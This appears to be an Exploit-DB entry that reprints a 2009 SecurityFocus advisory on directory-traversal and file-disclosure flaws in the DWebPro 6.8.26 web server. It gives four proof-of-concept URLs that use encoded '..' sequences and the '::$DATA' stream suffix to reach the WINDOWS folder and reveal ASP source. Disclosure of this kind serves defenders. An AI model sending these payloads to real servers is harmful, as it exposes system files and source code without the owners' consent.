DWebPro 6.8.26 - Directory Traversal / Arbitrary File Disclosure

Author: Alfons Luja
type: remote
platform: windows
port: 
date_added: 2009-04-27  
date_updated: 2014-04-21  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 32957.txt  

source: https://www.securityfocus.com/bid/34721/info

DWebPro is prone to a directory-traversal vulnerability and a vulnerability that allows attackers to view arbitrary files.

An attacker can exploit these issues to obtain sensitive information that may lead to other attacks.

DWebPro 6.8.26 is vulnerable; other versions may also be affected.

http://www.example.com:8080/..%5C/www/..%5C/www/..%5C/..%5C/..%5C/WINDOWS/
http://www.example.com:8080/..%2f..%2f..%2fWINDOWS%2f
http://www.example.com:8080/..\/www/500-100-js.asp::$DATA
http://www.example.com:8080/demos/aspclassic/asp_registry.asp::$DATA